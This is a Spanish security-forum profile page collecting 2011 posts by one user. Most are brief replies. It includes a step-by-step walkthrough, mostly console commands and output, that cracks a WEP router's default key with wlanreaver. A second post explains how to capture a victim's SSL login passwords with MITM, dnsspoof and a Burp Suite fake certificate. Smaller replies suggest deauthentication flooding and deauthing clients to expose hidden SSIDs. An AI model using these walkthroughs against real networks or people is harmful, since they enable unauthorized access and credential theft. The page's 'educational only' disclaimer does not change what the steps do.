Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - kikerap

#1
Seguridad Wireless / Re:Contraseñas por Defecto en Routers
Septiembre 02, 2011, 04:16:02 PM
Si jaja, yo tambien tengo una buena colección de paginas con info de ese tipo :) .
#2
Seguridad Wireless / Re:Probando WLANREAVER v0.5
Septiembre 02, 2011, 09:12:05 AM
Si :), es que lo que hace el script es enviar arpings al router, probando cada clave del diccionario, esperando a que el router conteste a la clave correcta.

El cliente que se ve, es mi propia interfaz wlan0 (que no esta en modo monitor, por supuesto), enviando un montón de arpings.

Otra cosa, si no podeis ejecutarlo con  ./wlanreaver , especificad el binario asi,   perl wlanreaver .
#3
Seguridad Wireless / Probando WLANREAVER v0.5
Septiembre 02, 2011, 07:54:49 AM
Hace unos dias vi un post sobre esta herramienta, creo que de Comandante Linux, y tenía pensado probarla. Me encontre una red de estas redes WLAN_XX, confiaba en que tenía la contraseña de fábrica, asi que me dispuse a capturar uno 6 o 7 paquetes para luego pasarle el correspondiente diccionario ...... pero no habia manera, el router no soltaba ni uno, ademas no había clientes ......

Me dispongo ha hacer una reinyección de peticiones arp, y no habia manera de sacarle un paquete (tampoco quería esperar mucho). Podia haber probado otros ataques pero, ahi tenemos una buena ocasión de probar el wlanreaver v0.5.

Esta vez os muestro lo que hize: auditoria a una típica red WLAN_XX con contraseña por defecto desde BackTrack 4 rc2 (live cd).

Vamos a empezar, el script se basa en la utilización de un diccionario para los ataques, ya sea crear uno "nuevo" con StrinGenerator, o con un patrón, con las demás herramientas.

Una cosa, como es un script y todo se hace por consola, paso de sacar la fotito, editarla y subirla al server :) ... asi que copio y pego de la consola. Tambien voy a omitir lo de poner la tarjeta en modo monitor, spoofing de la mac y algunos comandos no relacionados con el script ..... si, asi es ;) .

Lanzamos un airodump-ng para ver los datos necesarios:

Código: php

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

E0:91:XX:XX:XX:XX  -68      303        0    0   6  54 . WEP  WEP         WLAN_XX


Bien, descargamos el paquete desde la web oficial:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso lo tengo en esta ruta: /root/wlr-0.5.tar.gz

Lo extraemos:
Código: php

root@bt:~# tar -zxf wlr-0.5.tar.gz


Nos metemos en el directorio creado:

Código: php

root@bt:~# cd wlanreaver/


Y ya podemos ejecutarlo:

Código: php

root@bt:~/wlanreaver# ./wlanreaver
Usage: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination
  -f : quit on first reply
  -q : be quiet
  -b : keep broadcasting, don't go unicast
  -D : duplicate address detection mode
  -U : Unsolicited ARP mode, update your neighbours
  -A : ARP answer mode, update your neighbours
  -V : print version and exit
  -c count : how many packets to send
  -w timeout : how long to wait for a reply
  -I device : which ethernet device to use (eth0)
  -s source : source ip address
  destination : ask for what ip address

NO TIENES INSTALADO "ARPING" O TU VERSION NO ES COMPATIBLE CON EL SCRIPT !!!

El "arping" usado por el script no es compatible con el arping de
las "iputils". Este paquete es usado por el gestor de conexiones
Network-Manager incluido en muchas distribuciones por defecto.

Se instalara otro gestor de conexiones (WICD) solo en distribuciones
que usen el sistema de paquetes .deb

HAZLO BAJO TU PROPIA RESPONSABILIDAD.

Deseas instalar una version compatible con el script (S/N)? s

1) Distribuciones basadas en Debian como Ubuntu, BT4... (paquetes .deb).
2) Otras distribuciones (compilacion de codigo).

Elige el tipo de distribucion:


Como veis el script se inicia correctamente, y nos manda instalar arping (desinstalará iputils-arping) y wicd (desinstalará network-manager), por eso recomiendo utilizar un live cd. Los paquetes estan contenido en el archivo ".tar.gz" asi que los instalará automaticamente, y ya podemos trabajar con el script.

Lo primero que vamos ha hacer es generar un diccionario para nuestra red WLAN_XX (opción 4), y nos pedirá unos cuantos datos, obtenidos previamente en el airodump-ng que lanzamos (los diccionarios estan en el directorio "/wlanreaver/dicc"):

Código: php

========================================================
     WlanReaver v0.5 by |FluiD| / Jose CSS (Feb. 2011)
           [http://www.seguridadwireless.net]
========================================================
0) Ayuda.
1) Inyeccion ARP.
2) Ataque de diccionario.
========================================================
GENERADORES DE DICCIONARIOS:
----------------------------
3) StrinGenerator    v1.3
4) WlanDecrypter     v1.3.2
5) JazztelDecrypter  v0.2.1
6) Wlan4xx           v0.1.2
7) Ono4xx            v0.0.2a
----------------------------
8) Borrar diccionarios => (0).
========================================================
  9) Wavemon=(on)            10) Rate=(NA)
11) Quality=(NA)            12) Logs=(off)
13) Borrar temporales y logs => (0).
14) Ataque de diccionario: Modo turbo.
========================================================
Elige una opcion: 4

wlandecrypter v1.3.2 (2011/02/02) [http://www.seguridadwireless.net]
2006 Nilp0inteR  2007-09 dudux  2010 BlackHole  2009-11 NirozMe|on

Introduce el BSSID (MAC) del AP/router: E0:91:XX:XX:XX:XX
Introduce el ESSID del AP/router (WLAN_XX): WLAN_XX
Introduce el nombre del diccionario a crear: dic_wlan_xx.txt

wlandecrypter v1.3.2 (2011/02/02) [http://www.seguridadwireless.net]

[+] BSSID: E0:91:XX:XX:XX:XX
[+] Modelo: Xavi 7968-Solos 4610RD/461x
[+] Generando fichero de claves: dicc/dic_wlan_xx.txt
[+] Fichero guardado OK
[+] Generadas 65536 claves (896 KB)
[+] Proceso finalizado con exito

Pulsa INTRO para continuar...


Una vez que tenemos el diccionario vamos realizar el ataque (opción 2), y damos los datos que nos pide. Como veis, nos pide un adaptador en MODO MANAGED, que es el "modo normal" de una tarjeta de red. También nos pedirá la ip del router, la opción por defecto es 192.168.1.1 pero puede ser 192.168.0.1 o cualquiera segun la haya puesto el admin, aunque se puede saber con otras aplicaciones que no vienen al caso. Podeis definir tambien la ip que utilizareis vosotros, por defecto la elije al azar.

El tipo de cifrado, dependerá del contenido del diccionario, en nuestro caso es ASCII. Y por último el tiempo de espera, que ya lo explica ahi.

Código: php

========================================================
     WlanReaver v0.5 by |FluiD| / Jose CSS (Feb. 2011)
           [http://www.seguridadwireless.net]
========================================================
0) Ayuda.
1) Inyeccion ARP.
2) Ataque de diccionario.
========================================================
GENERADORES DE DICCIONARIOS:
----------------------------
3) StrinGenerator    v1.3
4) WlanDecrypter     v1.3.2
5) JazztelDecrypter  v0.2.1
6) Wlan4xx           v0.1.2
7) Ono4xx            v0.0.2a
----------------------------
8) Borrar diccionarios => (1).
========================================================
  9) Wavemon=(on)            10) Rate=(NA)
11) Quality=(NA)            12) Logs=(off)
13) Borrar temporales y logs => (0).
14) Ataque de diccionario: Modo turbo.
========================================================
Elige una opcion: 2

Diccionarios disponibles:
-------------------------
dic_wlan_xx.txt
-------------------------
Elige el diccionario: dic_wlan_xx.txt

Selecciona un adaptador EN MODO "MANAGED".
Adaptadores detectados:
------------------------
eth0
irda0
wlan0
wlan1
mon0
------------------------
Adaptador de red?: wlan0

Introduce el BSSID (MAC) del AP/router: E0:91:XX:XX:XX:XX
Introduce el ESSID del AP/router (sensible a mayus/minus): WLAN_XX

Introduce la IP del AP/router (INTRO => 192.168.1.1):
Introduce la IP del cliente falso a asociar (INTRO => 192.168.1.x):

Tipo de cifrado WEP:
--------------------
1) ASCII (dicc. con 5 o 13 caracteres => WLAN_XX / JAZZTEL_XX / WLANXXXXXX...
2) HEX   (dicc. con 10 o 26 caracteres)
----------------
Elige el cifrado WEP (INTRO => ASCII):

Introduce el numero de ARPs a enviar por cada clave (INTRO => 2): 5

====================================================
         Tiempo de espera entre intentos (ms)
----------------------------------------------------
         [1-2] .................. Muy rapido
         [3-5] .................. Rapido
         [6-10] ................. Moderado
         [11-50] ................ Normal
         [51-100] ............... Lento
----------------------------------------------------
* A mayor velocidad, menor probabilidad de acierto *
Los tiempos de 1ms y 2ms NO ESTAN RECOMENDADOS, ya
que producen tasas muy elevadas de falsos negativos.
====================================================

Introduce el tiempo de espera entre intentos: 6

Levantando interfaz (wlan0)...
Estableciendo ESSID (WLAN_XX)...
Estableciendo IP del cliente (192.168.1.125)...
Estableciendo cifrado WEP (ASCII)...
Asociando con WLAN_XX (E0:91:XX:XX:XX:XX)...
ASOCIACION FALSA CORRECTA !!!

Iniciando ataque de diccionario...

[x:xx] Probadas 100 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 200 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 300 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 400 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 500 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 600 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 700 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 800 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 900 claves. Ultima: XXXXXXXXXXXXX
[x:xx] Probadas 1000 claves. Ultima: XXXXXXXXXXXXX

Velocidad de comprobacion: 12.27 claves/s.


Y a partir de aqui, el script se encarga de lo demás, cabe destacar que nos lanza 2 terminales con las aplicaciónes Wavemon, y Link-Quality, meramente informativas.



Si aun teneis lanzado el airodump-ng, vereis que suben los datas, pero no os emocioneis, estos paquetes no os servirán para nada:

Código: php

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

E0:91:XX:XX:XX:XX  -69  96    18108   121785   65   6  54 . WEP  WEP    OPN  WLAN_XX

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

E0:91:XX:XX:XX:XX  00:11:22:33:44:55    0    6 -54      0   121861  WLAN_XX


Podeis hacer la prueba lanzando el aircrack-ng:

Código: php

root@bt:~/wlanreaver/dicc# aircrack-ng -w dic_wlan_xx.txt /root/captura_wlan_xx-01.cap
Opening /root/captura_wlan_xx-01.cap
Read 113673 packets.

   #  BSSID              ESSID                     Encryption

   1  E0:91:XX:XX:XX:XX  WLAN_XX                   WEP (108670 IVs)

Choosing first network as target.

Opening /root/captura_wlan_xx-01.cap

                                                                       Aircrack-ng 1.1 r1738


                                                       [00:00:02] Tested 61596 keys (got 108670 IVs)

   KB    depth   byte(vote)
    0    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    1    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    2    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    3    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    4    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    5    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    6    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    7    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    8    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
    9    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   10    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   11    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)
   12    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0)



Quitting aircrack-ng...


Y después de poco/mucho esperar:

Código: php

[xx:xx] Probadas 30100 claves. Ultima: XXXXXXXXXXXXX
[xx:xx] Probadas 30200 claves. Ultima: XXXXXXXXXXXXX
[xx:xx] Probadas 30300 claves. Ultima: XXXXXXXXXXXXX
[xx:xx] Probadas 30400 claves. Ultima: XXXXXXXXXXXXX
[xx:xx] Probadas 30500 claves. Ultima: XXXXXXXXXXXXX

CLAVE ENCONTRADA !!! ----------> XXXXXXXXXXXXX <----------



pd: Cuando me disponia a ejecutar el ataque 1) Inyeccion ARP, se blokeo el backtrack (será por lo de live cd), asi que eso lo probais vosotros :).


#4
Je je si era afirmación.
#5
Yo probe la versión 0.3 y me iba bien, pero fue ya hace tiempo ... quiza lo retome algun dia de estos :)


pd: Se me olvidaba, las dependencias estan junto con la aplicación.
#6
Cuando las cosas dan tantos problemas lo mejor es cambiarse de compañia, y que te den buen material, que para eso pagas.
#7
Mientras buscaba el post donde vi la aplicación, me preguntaba .... no tengo buenos recuerdos de este homebrew, por que sera .... Bueno el caso es que lei los comentario y la gente no esta muy contenta, parece que no funciona bien :/, pero por probar que no quede:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

pd: ignoro si hay nuevas versiones.
#8
Dudas y pedidos generales / Re:Ataque Ddos.
Agosto 14, 2011, 10:58:27 AM
Mmmm prueba a mandar paquetes de deautentificacion a la direccion broadcast del router.

Morphiss88, como abuses de estas cosas, la victima hablara con el isp, y si lo cree oportuno realizará la denuncia pertinente.
#9
Vaya que recuerdos de cuando ponia el custom firmware de Dark AleX .... ufff menos mal que nunca tuve brick's.

Por cierto yo tambien tengo la FAT y el wifi me va perfecto, aunque ya no la utilizo ....

pd: Incluso recuerdo que se hizo una version de aircrack-ng compatible ..... aunque solo la hice una pequeña revision ...
#10
GNU/Linux / Re:Guía rápida de TCPDUMP
Agosto 12, 2011, 04:44:34 PM
Si, es una herramienta que quiza deberia utilizar con mas frecuencia :/
#11
Windows / Re:[Tutorial] Todo sobre el archivo HOSTS
Agosto 12, 2011, 11:31:21 AM
Muy interesante, me gusto :D .
#12
Dudas y pedidos generales / Re:[Consulta] Red SSID
Agosto 12, 2011, 10:59:18 AM
Si analizas el entorno con wireshark, el SSID o ESSID es mandado en los paquetes "Beacons frame", pero al desactivar el broadcasting de ssid, este aparecerá en el paquete "beacon" o baliza, como "broadcast", que quiere decir que no se especifico.

Si utilizas el airodump-ng, veras que esa red muestra como SSID, algo como "<leng: 0>", pues bien, puedes hacer varias cosas:

En el momento en que un cliente se asocie al AP, airodump lo detectará y actualizará el SSID, para ello airodump-ng se fija en los paquetes de asociacion o "Association Request". Pero tambien podemos fijarnos en el wireshark, antes de que el cliente se conecte, enviará un "Probe Request" al AP, que incluirá el SSID.

Si tenemos a un cliente conectado, podemos deautentificarle, con aireplay-ng (--deauth), para que vuelva a enviar los paquetes mencionados anteriormente.

Saludos, espero que asi lo comprendas mejor :) .
#13
Redes y antenas / Re:Cómo cambiar los DNS
Agosto 08, 2011, 03:26:40 PM
Me gusto :D.
#14
Dudas y pedidos generales / Re:Necesito una ayuda...
Agosto 08, 2011, 03:03:05 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#15
Pues todo depende de si se desactivo el broadcasting de ESSID o además tambien se desactivo el envio Beacons.
#16
Redes y antenas / Re:Tecnologias XDSL
Junio 03, 2011, 09:50:13 AM
Interesante, ;) .
#17
Hacking / Obtener contraseñas de conexiones SSL
Mayo 28, 2011, 08:45:21 PM
Os traigo este tuto  que ya he posteado por ahi, y bueno, ahora lo comparto con ustedes.

Bien, pues inspirado en un video, muy bueno por cierto, voy a contaros como capturar contraseñas de las conexiones ssl, de un host victima. Para esto vamos a utilizar Backtrack (virtualizado en "Virtual Box"), y un s.o. de esos caros, Window$.


Como ya sabran, no me hago responsable del uso que deis a esta información. Su proposito es meramente educativo, si dañan a un tercero deberan atenerse a las posibles consecuencias.


Código: php

------Tabla ip's:------
Router  ---> 192.168.0.1
Window$ ---> 192.168.0.117
Backtrack -> 192.168.0.115
-----------------------


Comenzamos por hacer un Mitm, en este caso os remito al tutorial que postee hace unos dias,    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez que tenemos el mitm en ejecución, el siguiente paso es capturar sus peticiones. Para ello utilizaremos el dns spoof.

Código: php

# dnsspoof -i eth0




Bien, ahora vamos con la herramienta mas importante, la que actuara de proxy y enviara el certificado ssl falso. La herramienta que utilizaremos será Burp Suite, que la encontrareis aqui:



Bien una vez iniciado, deberemos configurarla debidamente. Antes de hacer nada debemos deshabilitar la opción "proxy>intercep>intercep is on", clickeando sobre ella. En la pestaña "alerts" veremos los succesos que ocurren. Ahora vamos a "proxy>options", activamos el puerto 8080, y añadimos el 80 y el 443 (ponerlo en "local listener port:" y pulsar "add").

Para que a la victima no le aparezca un error de proxy (que le impide navegar), debemos habilitar la opción "support invisible proxying...", en los dos puertos añadidos. Para esto editamos cada puerto ("edit"), activamos la opción y actualizamos los cambios con "update". Nos quedará tal que asi:



Una vez echo esto podemos ir a la pestaña "intercep" y volver a habilitar "intercep is on". Si todo lo habeis hecho bien, empezareis a ver capturas de las peticiones que la victima realiza. Mientras que la captura este recluida en nuestro proxy el navegador de la victima estara esperando la respuesta del servidor, asi que para pasar la respuesta a la victima solo tenemos que dar a "forward".

Ahora la victima va a entrar a gmail, por ejemplo. Vemos que le aparece una cantosa advertencia "El certificado de seguridad del sitio no es de confianza".



Un usuario normal, que no haya oido hablar de certificados, ni de ataques de ningun tipo, lo unico que va ha buscar es poder seguir navegando tranquilamente. Va ha buscar la forma de quitarse de en medio ese cartelito, que dice no se que cosas. Si el usuario es avanzado de ninguna manera procederá a aceptar, y menos a logearse, en dicha pagina. Asi que, si posteriormente no vemos un login....abortamos la misión.

Ahora solo queda esperar a que lleguen los datos adecuados.....


#18
Back-end / Re:[Taller de PHP]
Mayo 28, 2011, 11:46:43 AM
Si utilizais el server en sistemas Gnu con Linux, la ruta para guardar los archivos es esta:
Código: php

/opt/lampp/htdocs
#19
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Kike el de poder hacer uso de un distribucion o software para hacking Wirless te refieres?

Lo correcto son herramientas para auditar redes inalambricas, si le das otro uso depende de cada uno

Por ahi va el tema, me refiero a la constante simplificación de estas herramientas. Cada vez hay mas y mas script's que simplifican todo el proceso, con lo cual, el que lo utiliza, deja de saber de donde sale cada cosa.

Esto va creando una sociedad menos curiosa y que espera que todo se lo den hecho, y asi ......... no avanzamos.......
#20
La verdad, no soy partidario de esta live. No quiero desmerecer la labor de ZhaoChunsheng, pero no creo que este tipo de cosas sean positivas para la sociedad.